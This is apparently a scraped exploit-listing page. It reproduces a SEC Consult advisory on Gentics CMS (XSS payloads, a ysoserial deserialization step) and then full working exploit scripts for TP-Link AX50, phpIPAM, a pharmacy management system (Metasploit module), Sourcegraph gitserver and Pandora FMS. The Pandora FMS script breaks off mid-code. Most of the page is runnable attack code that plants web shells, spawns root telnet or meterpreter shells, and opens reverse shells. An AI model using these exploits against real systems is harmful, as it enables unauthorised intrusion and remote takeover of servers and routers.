Latest exploits :: CodePwn

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220608-0 > ======================================================================= title: Stored Cross-Site Scripting & Unsafe Java Deserializiation product: Gentics CMS vulnerable version: 5.36.29, see section below fixed version: 5.40.27, 5.41.15, 5.42.7, 5.43.1 or higher CVE number: CVE-2022-30981, CVE-2022-30982 impact: high homepage: https://www.gentics.com/ found: 2021-04-02 by: Gerhard Hechenberger (Office Vienna) Steffen Robertz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "APA-IT Informations Technologie GmbH offers offers support with a focus on media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press Agency, we are responsible for the IT of the Austrian news agency as well as numerous other media enterprises. This expertise and insight into the industry make APA-IT an expert for IT solutions for publishers and media-related companies. Existing systems and tools are constantly developed and tailored to individual customer needs. As such, APA-IT is always available – from conception to operation." Source: https://www.gentics.com/genticscms/company_gentics.en.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult recommends to perform a thorough security review of these products conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: ----------------------------------- 1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) Multiple cross-site scripting vulnerabilities are present in the application. An attacker can store malicious JavaScript code in the username and profile description. The code will execute once an admin user hovers over the attacker's username. Thus, the attacker can execute code in the context of an admin. 2) Unsafe Java Deserialization (CVE-2022-30981) The Gentics CMS has an import option which will accept ZIP files. The archive includes a Java serialized object that gets deserialized on import. This can lead to code execution on the server. A low privileged user might be able to exploit this vulnerability by chaining it together with vulnerability 1). Proof of concept: ----------------- 1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) To trigger the first XSS, an attacker has to change the profile description to include a payload, e.g. "<script>alert(document.domain)</script)". The payload will execute once a user with access to the userlist hovers his mouse over the profile name. The event "onmouseover" will trigger following code: JSI3_comp_list_401__ass( this, 'Properties', 'Malicious User Name <script>alert(document.domain)</script> created: 09/20/2002 ( Gentics Support) last edited: 15:56 (Malicious Username)', '' ); The execution of the code leads to following function: function JSI3_comp_list_401__ass( obj, title, text, assTitle ) { JSI3_comp_list_401__assReset(); clearTimeout( JSI3_comp_list_401___ass_timeout ); JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ); } The malicious code, which is contained in the "text" parameter, gets passed through to the next function. There it is added to an HTML element and thus executed in the browser. function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) { if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) { JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true; $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?' '+assTitle:'')); $(obj).tipsy({ trigger: 'manual', html: true, offset: 3, delayIn: 900, delayOut: 0, opacity: 0.85, gravity: 'nww' }); } $(obj).tipsy("show"); gcn_active_tipsy = obj; } Another XSS vector can be found in the parameters "First Name" and "Last Name". By e.g. changing the last name to 'Node" onload="alert(document.domain)', JavaScript code is added to the profile picture that is loaded in the upper right corner on every page. The following snippet shows the vulnerable line of code: <div id="profil"> <div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div> The third XSS is caused by changing the first and last name into JavaScript code without prior encoding. Changing the last name to "Last Name'+eval(alert(document.domain))+'" will cause the following code to be included in the server's response: <script language="JavaScript" type="text/javascript"> var menus = new Array(); var imgs = new Array(); menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array(); menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1; menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r'; 2) Unsafe Java Deserialization (CVE-2022-30981) First, a malicious ZIP archive needs to be created. The following files will need to be included within this archive: bundlebuild.xml: <?xml version="1.0" encoding="UTF-8"?> <bundlebuild> <bundleinfo> <name><![CDATA[test4]]></name> <sourcehost><![CDATA[b1d80757b76c]]></sourcehost> <description><![CDATA[]]></description> <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid> <globalprefix>D77D</globalprefix> </bundleinfo> <builds> <build> <builddate>1618996405</builddate> <changelog><![CDATA[test4]]></changelog> <count>0</count> </build> </builds> <tables> </tables> </bundlebuild> containedobjects.xml: <?xml version="1.0" encoding="UTF-8"?> <objects> </objects> The third file has to be named "serializedjava.bin" and contains the actual payload. A demo payload can be generated with following command: $ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin Those three files have to be zipped together into an archive, which can be uploaded. The import feature is available under Enterprise CMS -> Administration -> Import and Export. Now select New->Import and upload the malicious ZIP archive. Wait until the import completed. Now click on "Test succeeded" in the file list. On the new screen select "Start import in background". The payload should create a file called "upload_<random_uuid>.tmp" in the folder /tmp. It will contain the string "SECTEST". Better deserialization chains could be built to reach more interesting targets. It is very likely, that RCE could be obtained by writing an own deserialization chain. Vulnerable / tested versions: ----------------------------- The following product version has been tested and found to be vulnerable. Other versions are vulnerable as well, please see the vendor's changelog in the solution section. * Gentics CMS 5.36.29 Vendor contact timeline: ------------------------ 2022-04-04: Contacting vendor through support@gentics.com 2022-04-04: Ticket SUP-13323 created. 2022-04-05: Sent advisory via unencrypted email to provided vendor email address. 2022-05-04: Updates for Gentics CMS were released on 14th April. 2022-05-05: Gentics provides us with the fixed version numbers. 2022-06-08: Release of security advisory. Solution: --------- Update to versions greater or equal to: * 5.40.27 (see https://gentics.com/Content.Node/changelog/5.40.0/5.40.27.html) * 5.41.15 (see https://gentics.com/Content.Node/changelog/5.41.0/5.41.15.html) * 5.42.7 (see https://gentics.com/Content.Node/changelog/5.42.0/5.42.7.html) * 5.43.1 (see https://gentics.com/Content.Node/changelog/5.43.0/5.43.1.html) Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Gerhard Hechenberger, Steffen Robertz / @2022 </code></pre>

<pre><code># Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Tomas Melicher # Technical Details: https://github.com/aaronsvk/CVE-2022-30075 # Date: 2022-06-08 # Vendor Homepage: https://www.tp-link.com/ # Tested On: Tp-Link Archer AX50 # Vulnerability Description: Remote Code Execution via importing malicious config file # CVE: CVE-2022-30075 #!/usr/bin/python3 import argparse # pip install argparse import requests # pip install requests import binascii, base64, os, re, json, sys, time, math, random, hashlib import tarfile, zlib from Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome from Crypto.PublicKey import RSA from Crypto.Util.Padding import pad, unpad from Crypto.Random import get_random_bytes from urllib.parse import urlencode class WebClient(object): def __init__(self, target, password): self.target = target self.password = password.encode('utf-8') self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8') self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') self.stok = '' self.session = requests.Session() data = self.basic_request('/login?form=auth', {'operation':'read'}) if data['success'] != True: print('[!] unsupported router') return self.sign_rsa_n = int(data['data']['key'][0], 16) self.sign_rsa_e = int(data['data']['key'][1], 16) self.seq = data['data']['seq'] data = self.basic_request('/login?form=keys', {'operation':'read'}) self.password_rsa_n = int(data['data']['password'][0], 16) self.password_rsa_e = int(data['data']['password'][1], 16) self.stok = self.login() def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) plaintext_padded = pad(plaintext, aes_block_size) return cipher.encrypt(plaintext_padded) def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) plaintext_padded = cipher.decrypt(ciphertext) plaintext = unpad(plaintext_padded, aes_block_size) return plaintext def rsa_encrypt(self, n, e, plaintext): public_key = RSA.construct((n, e)).publickey() encryptor = PKCS1_v1_5.new(public_key) block_size = int(public_key.n.bit_length()/8) - 11 encrypted_text = '' for i in range(0, len(plaintext), block_size): encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex() return encrypted_text def download_request(self, url, post_data): res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True) filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0] if os.path.exists(filepath): print('[!] can\'t download, file "%s" already exists' % filepath) return with open(filepath, 'wb') as f: for chunk in res.iter_content(chunk_size=4096): f.write(chunk) return filepath def basic_request(self, url, post_data, files_data={}): res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data) return json.loads(res.content) def encrypted_request(self, url, post_data): serialized_data = urlencode(post_data) encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8')) encrypted_data = base64.b64encode(encrypted_data) signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data)) encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature) res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important if(res.status_code != 200): print('[!] url "%s" returned unexpected status code'%(url)) return encrypted_data = json.loads(res.content) encrypted_data = base64.b64decode(encrypted_data['data']) data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data) return json.loads(data) def login(self): post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)} data = self.encrypted_request('/login?form=login', post_data) if data['success'] != True: print('[!] login failed') return print('[+] logged in, received token (stok): %s'%(data['data']['stok'])) return data['data']['stok'] class BackupParser(object): def __init__(self, filepath): self.encrypted_path = os.path.abspath(filepath) self.decrypted_path = os.path.splitext(filepath)[0] self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) plaintext_padded = pad(plaintext, aes_block_size) return cipher.encrypt(plaintext_padded) def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) plaintext_padded = cipher.decrypt(ciphertext) plaintext = unpad(plaintext_padded, aes_block_size) return plaintext def encrypt_config(self): if not os.path.isdir(self.decrypted_path): print('[!] invalid directory "%s"'%(self.decrypted_path)) return # encrypt, compress each .xml using zlib and add them to tar archive with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar: for filename in os.listdir(self.decrypted_path): basename,ext = os.path.splitext(filename) if ext == '.xml': xml_path = '%s/%s'%(self.decrypted_path,filename) bin_path = '%s/%s.bin'%(self.decrypted_path,basename) with open(xml_path, 'rb') as f: plaintext = f.read() if len(plaintext) == 0: f = open(bin_path, 'w') f.close() else: compressed = zlib.compress(plaintext) encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) with open(bin_path, 'wb') as f: f.write(encrypted) tar.add(bin_path, os.path.basename(bin_path)) os.unlink(bin_path) # compress tar archive using zlib and encrypt with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2: compressed = zlib.compress(f1.read()+f2.read()) encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) # write into final config file with open('%s'%(self.encrypted_path), 'wb') as f: f.write(encrypted) os.unlink('%s/data.tar'%(self.decrypted_path)) def decrypt_config(self): if not os.path.isfile(self.encrypted_path): print('[!] invalid file "%s"'%(self.encrypted_path)) return # decrypt and decompress config file with open(self.encrypted_path, 'rb') as f: decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read()) decompressed = zlib.decompress(decrypted) os.mkdir(self.decrypted_path) # store decrypted data into files with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f: f.write(decompressed[0:16]) with open('%s/data.tar'%(self.decrypted_path), 'wb') as f: f.write(decompressed[16:]) # untar second part of decrypted data with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar: tar.extractall(path=self.decrypted_path) # decrypt and decompress each .bin file from tar archive for filename in os.listdir(self.decrypted_path): basename,ext = os.path.splitext(filename) if ext == '.bin': bin_path = '%s/%s'%(self.decrypted_path,filename) xml_path = '%s/%s.xml'%(self.decrypted_path,basename) with open(bin_path, 'rb') as f: ciphertext = f.read() os.unlink(bin_path) if len(ciphertext) == 0: f = open(xml_path, 'w') f.close() continue decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext) decompressed = zlib.decompress(decrypted) with open(xml_path, 'wb') as f: f.write(decompressed) os.unlink('%s/data.tar'%(self.decrypted_path)) def modify_config(self, command): xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path) if not os.path.isfile(xml_path): print('[!] invalid file "%s"'%(xml_path)) return with open(xml_path, 'r') as f: xml_content = f.read() # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script payload = '<service name="exploit">\n' payload += '<enabled>on</enabled>\n' payload += '<update_url>http://127.0.0.1/</update_url>\n' payload += '<domain>x.example.org</domain>\n' payload += '<username>X</username>\n' payload += '<password>X</password>\n' payload += '<ip_source>script</ip_source>\n' payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&')) payload += '<interface>internet</interface>\n' # not worked for other interfaces payload += '<retry_interval>5</retry_interval>\n' payload += '<retry_unit>seconds</retry_unit>\n' payload += '<retry_times>3</retry_times>\n' payload += '<check_interval>12</check_interval>\n' payload += '<check_unit>hours</check_unit>\n' payload += '<force_interval>30</force_interval>\n' payload += '<force_unit>days</force_unit>\n' payload += '</service>\n' if '<service name="exploit">' in xml_content: xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1) else: xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1) with open(xml_path, 'w') as f: f.write(xml_content) arg_parser = argparse.ArgumentParser() arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True) arg_parser.add_argument('-p', metavar='password', required=True) arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config') arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config') arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute') args = arg_parser.parse_args() client = WebClient(args.t, args.p) parser = None if not args.r: print('[*] downloading config file ...') filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'}) if not filepath: sys.exit(-1) print('[*] decrypting config file "%s" ...'%(filepath)) parser = BackupParser(filepath) parser.decrypt_config() print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path)) if not args.b and not args.r: filepath = '%s_modified'%(parser.decrypted_path) os.rename(parser.decrypted_path, filepath) parser.decrypted_path = os.path.abspath(filepath) parser.encrypted_path = '%s.bin'%(filepath) parser.modify_config(args.c) print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path)) if not args.b: if parser is None: parser = BackupParser('%s.bin'%(args.r.rstrip('/'))) print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path)) parser.encrypt_config() data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'}) timeout = data['data']['totaltime'] if data['success'] else 180 print('[*] uploading modified config file "%s"'%(parser.encrypted_path)) data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')}) if not data['success']: print('[!] unexpected response') print(data) sys.exit(-1) print('[+] config file successfully uploaded') print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t)) </code></pre>

<pre><code># Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-04-10 # Exploit Author: Guilherme '@behiNdyk1' Alves # Vendor Homepage: https://phpipam.net/ # Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5 # Version: 1.4.5 # Tested on: Linux Ubuntu 20.04.3 LTS #!/usr/bin/env python3 import requests import argparse from sys import exit, argv from termcolor import colored banner = """ █▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█ ▄█ ░ █░█ ░ █▀ █▀ █▀█ █░░ █ ▀█▀ █▀█ █▀█ █▀▀ █▀▀ █▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█ ░█ ▄ ▀▀█ ▄ ▄█ ▄█ ▀▀█ █▄▄ █ ░█░ █▄█ █▀▄ █▄▄ ██▄ █▄▄ █▄█ █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀ █▄█ ░█░ █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄\n""" print(banner) parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE") parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True) parser.add_argument("-usr", type=str, help="Username to log in as", required=True) parser.add_argument("-pwd", type=str, help="User's password", required=True) parser.add_argument("-cmd", type=str, help="Command to execute", default="id") parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html") parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?") args = parser.parse_args() url = args.url username = args.usr password = args.pwd command = args.cmd path = args.path # Validating url if url.endswith("/"): url = url[:-1] if not url.startswith("http://") and not url.startswith("https://"): print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow")) exit() def login(url, username, password): """Takes an username and a password and tries to execute a login (IPAM)""" data = { "ipamusername": username, "ipampassword": password } print(colored(f"[...] Trying to log in as {username}", "blue")) r = requests.post(f"{url}/app/login/login_check.php", data=data) if "Invalid username or password" in r.text: print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red")) exit() else: print(colored("[+] Login successful!", "green")) return str(r.cookies['phpipam']) auth_cookie = login(url, username, password) def exploit(url, auth_cookie, path, command): print(colored("[...] Exploiting", "blue")) vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php" data = { "subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -", "bgp_id": "1" } cookies = { "phpipam": auth_cookie } requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies) test = requests.get(f"{url}/evil.php") if test.status_code != 200: return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red")) if "--shell" in argv: while True: command = input("Shell> ") r = requests.get(f"{url}/evil.php?cmd={command}") print(r.text) else: print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green")) r = requests.get(f"{url}/evil.php?cmd={command}") print(f"\n\n[+] Output:\n{r.text}") exploit(url, auth_cookie, path, command) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework # Vendor: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download # Source: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Multi Language Pharmacy Management System Unauthenticated Remote Code Execution", 'Description' => %q{ This module exploits the file upload vulnerability of Multi Language Pharmacy Management System and allows remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Emirhan Kurt <emirhan@prodaft.com>' # author & msf module ], 'References' => [ ['URL', 'https://prodaft.com'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['php'], 'Arch' => [ ARCH_PHP], 'Targets' => [ ['PHP payload', { 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} } ] ], 'Privileged' => false, 'DisclosureDate' => "Dec 19 2018", 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The TARGET URI of the Pharmacy Management', '/']) ] ) end def exploit print_status('Uploading shell...') fname = rand_text_alphanumeric(rand(10) + 6) + '.php' boundary = "---------------------------#{rand_text_numeric(29)}" data_post = "--#{boundary}\r\n" data_post << "Content-Disposition: form-data; name=\"currnt_date\"" data_post << "\r\n\r\n" data_post << "\r\n" data_post << "--#{boundary}\r\n" data_post << "Content-Disposition: form-data; name=\"Medicine\"; filename=\"#{fname}\"\r\n" data_post << "Content-Type: application/x-php\r\n" data_post << "\r\n#{payload.encoded}\r\n" data_post << "--#{boundary}\r\n" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'php_action/createProduct.php'), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => data_post, }) if res && res.code == 302 && res.body.include?('Image uploaded successfully') print_good("Shell uploaded as #{fname}") else print_error("Server responded with code #{res.code}") print_error("Failed to upload shell") return false end print_status('Executing payload...') send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'assets/myimages/'+fname), 'method' => 'GET' }, 5) if res print_good("Payload successfully triggered !") else print_error("Server responded with code #{res.code}") print_error("Failed to upload shell") return false end handler end end </code></pre>

<pre><code># Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) # Date: 2022-06-10 # Exploit Author: Altelus # Vendor Homepage: https://about.sourcegraph.com/ # Version: 3.63.3 # Tested on: Linux # CVE : CVE-2022-23642 # Docker Container: sourcegraph/server:3.36.3 # Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3 # # Exploitation parameters: # - Exposed Sourcegraph gitserver # - Existing repo on sourcegraph import json import argparse import requests def exploit(host, existing_git, cmd): # setting sshCommand data = { "Repo" : existing_git, "Args" : [ "config", "core.sshCommand", cmd ] } res = requests.get(host+"/exec", json=data).text if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0) # setting fake origin data = { "Repo" : existing_git, "Args" : [ "remote", "add", "origin", "git@lolololz:foo/bar.git" ] } res = requests.get(host+"/exec", json=data).text if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0) # triggering command using push data = { "Repo" : existing_git, "Args" : [ "push", "origin", "master" ] } res = requests.get(host+"/exec", json=data).text print("[*] Finished executing exploit") parser = argparse.ArgumentParser() parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host") parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph") parser.add_argument('--cmd', required=True, help="Command to run") args = parser.parse_args() host = args.gitserver_host existing_git = args.existing_git cmd = args.cmd exploit(host, existing_git, cmd) </code></pre>

<pre><code># Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) # Date: 05/20/2022 # Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) # Vendor Homepage: https://pandorafms.com/ # Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz # Version: v7.0NG.742 # Tested on: Pandora FMS v7.0NG.742 (Ubuntu) # CVE: CVE-2020-5844 # Source: https://github.com/UNICORDev/exploit-CVE-2020-5844 # Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020. #!/usr/bin/env python3 # Imports try: import requests except: print(f"ERRORED: RUN: pip install requests") exit() import sys import time import urllib.parse # Class for colors class color: red = '\033[91m' gold = '\033[93m' blue = '\033[36m' green = '\033[92m' no = '\033[0m' # Print UNICORD ASCII Art def UNICORD_ASCII(): print(rf""" {color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} {color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} {color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} {color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} """) # Print exploit help menu def help(): print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution Usage: python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password> python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>] python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>] python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>] python3 exploit-CVE-2020-5844.py -h Options: -t Target host and port. Provide target IP address and port. -u Target username and password. Provide username and password to log in to Pandora FMS. -p Target valid PHP session ID. No username or password needed. (Optional) -s Reverse shell mode. Provide local IP address and port. (Optional) -c Custom command mode. Provide command to execute. (Optional) -w Web shell custom mode. Provide custom PHP file name. (Optional) -h Show this help menu. """) exit() # Pretty loading wheel def loading(spins): def spinning_cursor(): while True: for cursor in '|/-\\': yield cursor spinner = spinning_cursor() for _ in range(spins): sys.stdout.write(next(spinner)) sys.stdout.flush() time.sleep(0.1) sys.stdout.write('\b') # Run the exploit def exploit(exploitMode, targetSess): UNICORD_ASCII() # Print initial variables print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}") print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}") if targetSess is not None: print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}") elif targetUser is not None: print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}") print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}") if exploitMode == "command": print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}") if exploitMode == "web": print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}") if exploitMode == "shell": print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}") print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}") print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}") loading(15) # If a PHPSESSID is not provided, grab one with valid username and password if targetSess is None: try: getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"}) targetSess = getSession.cookies.get('PHPSESSID') print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}") if "login_move" in getSession.text: print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}") except: print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}") exit() # Set headers, parameters, and cookies for post request headers = { 'Host': f'{targetIP}', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874', 'Content-Length': '1289', 'Connection': 'close', 'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager', 'Upgrade-Insecure-Requests': '1', 'Sec-Fetch-Dest': 